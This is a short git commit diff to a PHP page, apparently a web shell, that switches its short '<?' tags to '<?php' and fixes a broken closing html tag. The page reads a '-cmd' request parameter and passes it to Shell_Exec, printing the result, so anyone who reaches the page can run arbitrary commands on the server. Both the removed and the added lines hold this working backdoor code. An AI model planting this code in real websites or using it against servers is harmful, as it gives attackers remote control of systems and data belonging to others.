This commit is contained in:
Matthieu Keller 2017-06-28 17:09:41 +02:00 committed by GitHub
parent 112ea8c248
commit f424ee76e4

View file

@ -10,9 +10,9 @@
style="background:#000000;color:#ffffff;">
<hr>
<pre>
<? $cmd = $_REQUEST["-cmd"];?>
<? if($cmd != "") print Shell_Exec($cmd);?>
</pre>
</form>
<?php $cmd = $_REQUEST["-cmd"];?>
<?php if($cmd != "") print Shell_Exec($cmd);?>
</body>
</html
</html>